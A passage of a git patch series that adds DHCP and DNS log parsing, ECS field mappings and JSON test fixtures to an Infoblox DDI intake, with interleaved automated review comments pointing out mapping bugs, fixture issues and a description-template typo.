lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_12: "%{WORD:event_action} to %{IP:client_ip} \\(%{MAC:client_mac}\\) via %{WORD:observer_ingress_interface_name}" + + - name: parse_datetime + external: + name: date.parse + properties: + input_field: "{{parse_event.message._tmp_timestamp}}" + output_field: result + format: "%d-%b-%Y %H:%M:%S.%f" + - name: set_ecs_fields stages: set_ecs_fields: actions: - set: - source.ip: "{{parse_event.message.src}}" - filter: "{{parse_event.message.src | is_ipaddress}}" + source.ip: "{{parse_event.message.client_ip}}" + filter: "{{parse_event.message.client_ip | is_ipaddress}}" - 
set: - source.port: "{{parse_event.message.spt}}" + "@timestamp": "{{parse_datetime.result}}" + event.action: "{{parse_event.message.event_action}}" + + source.port: "{{parse_event.message.client_port}}" + source.mac: "{{parse_event.message.client_mac}}" + + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" + + infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" + infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" + infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" + infoblox.dhcp.request_message: "{{parse_event.message.infoblox_nios_log_dhcp_request_message}}" + infoblox.dhcp.lease_message: "{{parse_event.message.infoblox_nios_log_dhcp_lease_message}}" + infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" + infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" + + dns.type: "query" dns.question.class: "{{parse_event.message.dns_question_class}}" dns.question.type: "{{parse_event.message.dns_question_type}}" dns.question.name: "{{parse_event.message.dns_question_name}}" - dns.type: "query" + dns.response_code: "{{parse_event.message.dns_response_code}}" + dns.header_flags: > [ {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} @@ -42,4 +148,4 @@ stages: filter: '{{parse_event.message.flags_tcp == "T"}}' - set: - infoblox.ddi.category: "{{parse_event.message.category}}" + infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json new file mode 100644 index 000000000..43383a2e1 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json 
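Review bot: `dns.type: "query"` in `set_ecs_fields` is still set unconditionally, so the DHCP events produced by the two new filtered `parse_event` stages are tagged as DNS queries — every `query_log_dhcp_*.json` fixture in this patch expects `dns.type: query` together with an empty `dns.header_flags`. Moving it into its own `- set:` guarded by `filter: "{{parse_event.message.dns_question_name is defined}}"` (the same `filter:` form the file already uses for `flags_tcp`) keeps `dns.*` off lease events. In `DNS_FORMERR`, the `IP#port` after the colon is, in BIND's resolver log, the upstream server that returned FORMERR rather than the client, yet it is captured as `client_ip`/`client_port` and ends up in `source.ip`/`source.port` (see `query_log_dns_1.json`, port 53); a `server_ip`-style capture mapped to `destination.*` would be the defensible reading. The DHCP patterns also capture `infoblox_nios_log_dhcp_uid`, `lease_duration`, `offered_duration`, `relay_interface_ip`/`relay_interface_name`, `remote_id` and `client_hostname`, none of which `set_ecs_fields` maps, so they are silently dropped (`query_log_dhcp_7.json` loses `lease-duration 172800`), and `DNS_OTHER` stores the lease type `Fixed` in `infoblox_nios_log_dns_category`, which `fields.yml` describes as the logging category. Whether DHCP lines that match none of the DNS alternatives in the first, unfiltered `parse_event` stage are tolerated depends on `raise_errors`, which sits above this hunk and is not visible here.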
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)"
+ },
+ "expected": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)",
+ "event": {
+ "action": "REQUEST DHCP"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0",
+ "lease_message": "NEW",
+ "lease_time": "undefined"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.222"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.222",
+ "ip": "192.168.1.222",
+ "mac": "00:50:56:ae:b3:44"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json
new file mode 100644
index 000000000..9474b00d8
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_2.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)"
+ },
+ "expected": {
+ "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)",
+ "event": {
+ "action": "REQUEST DHCP"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0",
+ "lease_message": "NEW",
+ "lease_time": "undefined"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.53"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.53",
+ "ip": "192.168.1.53",
+ "mac": "00:50:56:ae:b3:44"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_3.json b/Infoblox/ddi/tests/query_log_dhcp_3.json
new file mode 100644
index 000000000..bca901b0b
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_3.json
@@ -0,0 +1,31 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6"
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6",
+ "event": {
+ "action": "DHCPREQUEST"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.107",
+ "trans_id": "80b994d6"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.107"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.107",
+ "ip": "192.168.1.107",
+ "mac": "e8:c8:29:5c:c8:99"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json
new file mode 100644
index 000000000..417007f30
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_4.json
@@ -0,0 +1,38 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)"
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)",
+ "event": {
+ "action": "DHCPREQUEST"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "lease_message": "RENEW",
+ "trans_id": "823c1fa3"
+ }
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth2"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.208"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.208",
+ "ip": "192.168.1.208",
+ "mac": "00:50:56:ae:17:c6"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json
new file mode 100644
index 000000000..14a6991a4
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_5.json
@@ -0,0 +1,33 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable."
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.",
+ "event": {
+ "action": "DHCPREQUEST"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.95",
+ "request_message": "lease 192.168.1.95 unavailable.",
+ "router_ip": "192.168.1.95",
+ "trans_id": "ac1b72c4"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.95"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.95",
+ "ip": "192.168.1.95",
+ "mac": "d8:94:03:ec:da:d1"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json
new file mode 100644
index 000000000..f0ca93fce
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_6.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet)."
+ },
+ "expected": {
+ "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).",
+ "event": {
+ "action": "DHCPREQUEST"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "dhcp": {
+ "interface_ip": "192.168.1.159",
+ "request_message": "ignored (unknown subnet).",
+ "trans_id": "e711c0c1"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.159"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.159",
+ "ip": "192.168.1.159",
+ "mac": "c8:09:a8:f8:cd:e8"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_7.json b/Infoblox/ddi/tests/query_log_dhcp_7.json
new file mode 100644
index 000000000..301ee3a35
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_7.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800"
+ },
+ "expected": {
+ "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800",
+ "event": {
+ "action": "DHCPACK"
+ },
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth2"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.138"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.138",
+ "ip": "192.168.1.138",
+ "mac": "08:71:90:8d:0b:5d"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dhcp_8.json b/Infoblox/ddi/tests/query_log_dhcp_8.json
new file mode 100644
index 000000000..a0415a271
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dhcp_8.json
@@ -0,0 +1,27 @@
+{
+ "input": {
+ "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$"
+ },
+ "expected": {
+ "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$",
+ "dns": {
+ "header_flags": [],
+ "type": "query"
+ },
+ "infoblox": {
+ "ddi": {
+ "category": "Fixed"
+ }
+ },
+ "related": {
+ "ip": [
+ "192.168.1.113"
+ ]
+ },
+ "source": {
+ "address": "192.168.1.113",
+ "ip": "192.168.1.113",
+ "mac": "c4:d0:e3:b4:08:4d"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json
new file mode 100644
index 000000000..2c4c9a783
--- /dev/null
+++ b/Infoblox/ddi/tests/query_log_dns_1.json
@@ -0,0 +1,36 @@ +{ + "input": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53" + }, + "expected": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53", + "event": { + "action": "FORMERR" + }, + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.testing.io", + "registered_domain": "testing.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "type": "query" + }, + "related": { + "hosts": [ + "test.testing.io" + ], + "ip": [ + "192.168.1.136" + ] + }, + "source": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json new file mode 100644 index 000000000..44cae19f4 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_2.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +" + }, + "expected": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.io", + "registered_domain": "test.io", + "top_level_domain": "io", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 1130 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json new file mode 100644 index 000000000..6b742fbb7 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_3.json 
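Review bot: query_log_dns_2.json expects `dns.header_flags: []` for a line ending in `response: NXDOMAIN +`, although that trailing `+` is the token the parser's own `QUERY_FLAGS_RD: '[\+\-]'` custom pattern names as the recursion-desired flag; dns_3 (`+AE`) and dns_4 (`+A`) pin the same empty list. Either the flag string is not reaching `dns.header_flags` for the `response:` log form, or these fixtures were written from observed output rather than intended output; the parser is outside this hunk, so please confirm which before the expectations are committed. If RD is meant to be surfaced, the assertion should become `"header_flags": ["RD"]` (or whatever token the parser emits for `+`).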
@@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE" + }, + "expected": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.org", + "registered_domain": "test.org", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 12337 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json new file mode 100644 index 000000000..4806d5bab --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_4.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A" + }, + "expected": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "_ldap._tcp.test.test.net", + "registered_domain": "test.net", + "subdomain": "_ldap._tcp.test", + "top_level_domain": "net", + "type": "SRV" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "_ldap._tcp.test.test.net" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37188 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json new file mode 100644 index 000000000..bd240d9a7 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_5.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io." + }, + "expected": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.io", + "registered_domain": "test.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37521 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json new file mode 100644 index 000000000..1129be865 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_6.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1" + }, + "expected": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.org", + "registered_domain": "test.org", + "subdomain": "test", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 40432 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json new file mode 100644 index 000000000..b695d7a1a --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_7.json 
@@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;" + }, + "expected": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.dev", + "registered_domain": "test.dev", + "top_level_domain": "dev", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.dev" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 49943 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json new file mode 100644 index 000000000..2204069d9 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_8.json 
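Review bot: The redacted answer section in query_log_dns_7.json contains owner names with embedded spaces (`thmwh.l46l2i c8.c3r2fb7…`, `th mwh.xxxxxxxx…`, `81h xxxxxx.dev.`), which cannot occur in a query-log answer list, so this fixture exercises the parser on input it will never see and may hide how a real `;`-separated multi-record answer is handled. Re-redact with space-free labels (for example `rr1.example.dev.`) so the fixture stays representative. If the spaces were introduced deliberately to test robustness, say so in the file name or a sibling fixture so the intent survives.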
@@ -0,0 +1,33 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;", + "@timestamp": "2024-11-28T15:26:27.498000Z", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "PD2LORA2.enim.l2", + "subdomain": "PD2LORA2.enim", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "PD2LORA2.enim.l2" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 36615 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json new file mode 100644 index 000000000..f4a0e6e07 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_9.json 
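Review bot: query_log_dns_8.json maps `28-Nov-2024 15:26:27.498` to `@timestamp: 2024-11-28T15:26:27.498000Z`, i.e. a log timestamp that carries no zone is taken as UTC; if an appliance is configured for a non-UTC local time, its events will be shifted by that offset, which matters when correlating with other sources. That cannot be fixed in the fixture, but the assumption should be documented next to the timestamp handling in the parser, e.g. `# query-log timestamps carry no zone; assumed UTC (appliance must log in UTC)`, and ideally be a configurable intake option. The question name `PD2LORA2.enim.l2` against an answer owner of `test.dev.` is a redaction artefact; harmless here, but aligning them keeps the fixture credible.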
@@ -0,0 +1,35 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;", + "@timestamp": "2024-11-28T15:26:27.359000Z", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "www.bing.com", + "registered_domain": "bing.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "www.bing.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63175 + } + } +} \ No newline at end of file 
From 122c55a987f7f2ba91d921fd34af5050cf4b613a Mon Sep 17 00:00:00 2001
From: vg-svitla
Date: Fri, 29 Nov 2024 12:50:58 +0200
Subject: [PATCH 107/150] Fix smart description
---
Infoblox/ddi/_meta/smart-descriptions.json | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json
index 32aeb23c0..2b9898cb2 100644
--- a/Infoblox/ddi/_meta/smart-descriptions.json
+++ b/Infoblox/ddi/_meta/smart-descriptions.json
@@ -16,5 +16,24 @@
 "type": "request resolution of"
 }
 ]
+ },
+ {
+ "value": "{source.ip} perform {event.action}",
+ "conditions": [
+ {
+ "field": "source.ip"
+ },
+ {
+ "field": "event.action"
+ }
+ ]
+ },
+ {
+ "value": "Query on {source.ip}",
+ "conditions": [
+ {
+ "field": "source.ip"
+ }
+ ]
 }
 ]
From b226271306378a02784a4671bf577fa3c8472e0e Mon Sep 17 00:00:00 2001
From: vg-svitla
Date: Fri, 29 Nov 2024 15:45:31 +0200
Subject: [PATCH 108/150] Fix comments
---
Aruba Network/aruba-os/ingest/parser.yml | 7 -------
Cisco/cisco-ise/ingest/parser.yml | 8 --------
Cisco/cisco-meraki/ingest/parser.yml | 12 ------------
Cisco/cisco-secure-firewall/ingest/parser.yml | 3 ---
Cisco/cisco-secure-web-appliance/ingest/parser.yml | 3 ---
Citrix/citrix-adc/ingest/parser.yml | 5 -----
EfficientIP/solidserver-ddi/ingest/parser.yml | 3 ---
7 files changed, 41 deletions(-)
diff --git a/Aruba Network/aruba-os/ingest/parser.yml b/Aruba Network/aruba-os/ingest/parser.yml
index 7c22ea1e7..8f38ca817 100644
--- a/Aruba Network/aruba-os/ingest/parser.yml
+++ b/Aruba Network/aruba-os/ingest/parser.yml
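Review bot: The new description template `"{source.ip} perform {event.action}"` has a grammar slip and should read `"{source.ip} performs {event.action}"`. The fallback `"Query on {source.ip}"` also fires for any record that has `source.ip` but no `event.action`, which in this intake includes the DHCP `r-l-e:` lease records (query_log_dhcp_8 expects `source.ip` and no `event.action`), so a lease entry would be summarised as a DNS query; adding a condition on `dns.question.name` to the fallback, or a separate `"DHCP lease for {source.ip}"` entry keyed on `infoblox.ddi.category`, would keep the two apart.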
@@ -4,14 +4,12 @@ pipeline: external: name: grok.match properties: - raise_errors: false pattern: '%{DATA:prefix}\:\s*%{USERNAME:obs}\s*\:\s*%{GREEDYDATA:payload}\s*' - name: parse_auth_message external: name: grok.match properties: - raise_errors: false input_field: "parse_message.message.payload" pattern: ".*?User '%{USERNAME:user_name}'.*from %{IP:src_ip}.*" filter: "{{ parse_message.message.prefix.lower() == 'auth' }}" @@ -22,7 +20,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'mgr' }}" - name: parse_ssl_message @@ -31,7 +28,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'ssl' }}" - name: parse_sntp_message @@ -40,7 +36,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?at %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'sntp' }}" - name: parse_snmp_message @@ -49,7 +44,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'snmp' }}" - name: parse_dhcp_snoop_message @@ -58,7 +52,6 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?%{IP:src_ip}.*" - raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'dhcp-snoop' }}" - name: 